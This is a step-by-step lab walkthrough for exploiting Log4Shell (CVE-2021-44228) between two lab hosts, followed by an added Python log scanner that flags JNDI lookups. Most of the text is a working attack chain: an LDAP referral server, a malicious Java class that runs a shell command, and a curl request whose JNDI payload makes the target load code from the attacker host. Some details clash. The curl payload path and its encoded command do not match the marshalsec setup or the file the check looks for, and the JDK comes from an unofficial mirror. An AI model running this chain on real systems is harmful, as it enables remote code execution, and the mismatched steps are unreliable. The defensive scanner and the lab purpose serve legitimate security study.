Installing the Vulnerable Machine on the Ubuntu Host (10.250.1.60)

I will use these resources (https://github.com/christophetd/log4shell-vulnerable-app , https://github.com/mbechler/marshalsec and https://github.com/xiajun325/apache-log4j-rce-poc/ ) to build the CVE-2021-44228 vulnerable machine and the attacker machine. First, I install Docker on the vulnerable machine.

Docker Install On The Vulnerable Machine (10.250.1.60)

  • sudo apt update
  • sudo apt-get install apt-transport-https ca-certificates curl software-properties-common
  • curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo apt-key add -
  • sudo add-apt-repository "deb [arch=amd64] https://download.docker.com/linux/ubuntu $(lsb_release -cs) stable"
  • sudo apt update
  • sudo apt-get install docker-ce
  • docker --version
  • sudo systemctl start docker
  • sudo systemctl enable docker
  • sudo systemctl status docker

Installing Vulnerable Machine (10.250.1.60)

  • cd /tmp
  • sudo git clone https://github.com/christophetd/log4shell-vulnerable-app
  • cd log4shell-vulnerable-app/
  • sudo docker build . -t vulnerable-app
  • sudo docker run -p 8080:8080 --name vulnerable-app vulnerable-app

Prepare Attacker Machine (10.250.1.61)

Install Java JDK On the Attacker Machine

  • cd /tmp
  • sudo apt update
  • sudo apt-get install default-jdk
  • wget http://mirrors.rootpei.com/jdk/jdk-8u181-linux-x64.tar.gz
  • tar zxvf jdk-8u181-linux-x64.tar.gz
  • sudo mv ./jdk1.8.0_181 /usr/lib/jvm
  • sudo update-alternatives --install "/usr/bin/java" "java" "/usr/lib/jvm/jdk1.8.0_181/bin/java" 1
  • sudo update-alternatives --install "/usr/bin/javac" "javac" "/usr/lib/jvm/jdk1.8.0_181/bin/javac" 1
  • sudo update-alternatives --install "/usr/bin/javaws" "javaws" "/usr/lib/jvm/jdk1.8.0_181/bin/javaws" 1
  • sudo update-alternatives --config java (select the 1.8.0_181 entry)
  • sudo update-alternatives --config javac
  • sudo update-alternatives --config javaws
  • sudo vim /etc/environment (append the JDK paths and variables shown below)

# PATH="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games"
PATH="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/usr/lib/jvm/jdk1.8.0_181/bin:/usr/lib/jvm/jdk1.8.0_181/db/bin:/usr/lib/jvm/jdk1.8.0_181/jre/bin"
J2SDKDIR="/usr/lib/jvm/jdk1.8.0_181"
J2REDIR="/usr/lib/jvm/jdk1.8.0_181/jre"
JAVA_HOME="/usr/lib/jvm/jdk1.8.0_181"
DERBY_HOME="/usr/lib/jvm/jdk1.8.0_181/db"

  • echo $JAVA_HOME
  • java -version

Prepare the LDAP Referral Server On The Attacker (10.250.1.61)

  • cd /tmp
  • sudo apt install maven
  • git clone https://github.com/mbechler/marshalsec
  • cd /tmp/marshalsec
  • sudo mvn clean package -DskipTests
  • java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://10.250.1.61:8000/#Log4jRCE"

Prepare Malicious Java Code On The Attacker

  • mkdir /tmp/poc
  • cd /tmp/poc
  • vim Log4jRCE.java

public class Log4jRCE {

    // The static initializer runs as soon as the JNDI lookup loads this class.
    static {
        try {
            Runtime.getRuntime().exec("touch /tmp/pwned").waitFor();
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}
  • javac Log4jRCE.java
  • sudo python3 -m http.server (serves /tmp/poc on port 8000, the codebase URL given to marshalsec above)

Exploit The Target Machine From The Attacker

  • curl 10.250.1.60:8080 -H 'X-Api-Version: ${jndi:ldap://10.250.1.61:1389/Basic/Command/Base64/dG91Y2ggL2V0Yy9wd25lZDE=}'

Verify Code Execution On The Victim Machine (10.250.1.60)

  • sudo docker exec vulnerable-app ls /tmp (the file /tmp/pwned created by Log4jRCE should be listed)
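As an added defender-side example (not part of the original walkthrough): a small Python scanner that flags the JNDI lookup carried by the curl request above in proxy access-log lines. It first resolves nested Log4j lookups the way Log4j would (innermost first) so that a split-up "jndi" still matches. The log line format and the sample lines are constructed for this example; the default-value handling for lookups is a heuristic.

```python
import re

# Constructed sample access-log lines "ip method path status header value" (not real
# traffic). Line 1 carries the header value sent by the curl command in this walkthrough.
SAMPLE_LOG = """\
10.250.1.61 GET / 200 X-Api-Version ${jndi:ldap://10.250.1.61:1389/Basic/Command/Base64/dG91Y2ggL2V0Yy9wd25lZDE=}
10.250.1.50 GET / 200 X-Api-Version 1.2.3
10.250.1.61 GET / 200 User-Agent ${JNDI:rmi://10.250.1.61:1099/a}
10.250.1.61 GET / 200 X-Api-Version ${${lower:j}ndi:ldap://10.250.1.61:1389/a}
"""

# Innermost non-jndi lookup ${name:value}; Log4j resolves these before the outer
# lookup, so "${lower:j}ndi" is "jndi" by the time the JNDI lookup runs.
INNER_LOOKUP = re.compile(r"\$\{(?!\s*jndi\s*:)([^${}]*?):([^${}]*)\}", re.I)
# The resolved lookup: ${jndi:<scheme>://<host>...}
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:\s*//([^/:}\s]+)", re.I)

def _resolve(m):
    value = m.group(2)
    # "${env:NAME:-fallback}" style default: assume the variable is unset (heuristic).
    return value.split(":-", 1)[1] if ":-" in value else value

def normalize_lookups(s, max_rounds=16):
    """Collapse nested lookups innermost-first, bounded to avoid pathological input."""
    for _ in range(max_rounds):
        new = INNER_LOOKUP.sub(_resolve, s)
        if new == s:
            break
        s = new
    return s

def find_jndi(value):
    """Return (scheme, host) when the value resolves to a JNDI lookup, else None."""
    m = JNDI_LOOKUP.search(normalize_lookups(value))
    return (m.group(1).lower(), m.group(2)) if m else None

def scan_log(text):
    """Flag log lines whose header value carries a JNDI lookup (any scheme, any case)."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        parts = line.split(" ", 5)
        if len(parts) < 6:
            continue  # skip malformed lines rather than crash the scan
        src, _method, _path, _status, header, value = parts
        found = find_jndi(value)
        if found:
            hits.append({"line": lineno, "src": src, "header": header,
                         "scheme": found[0], "host": found[1]})
    return hits
```

Running scan_log(SAMPLE_LOG) reports lines 1, 3 and 4 with the scheme and the callback host, which is the value to pivot on when hunting for outbound LDAP/RMI connections from the application host.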
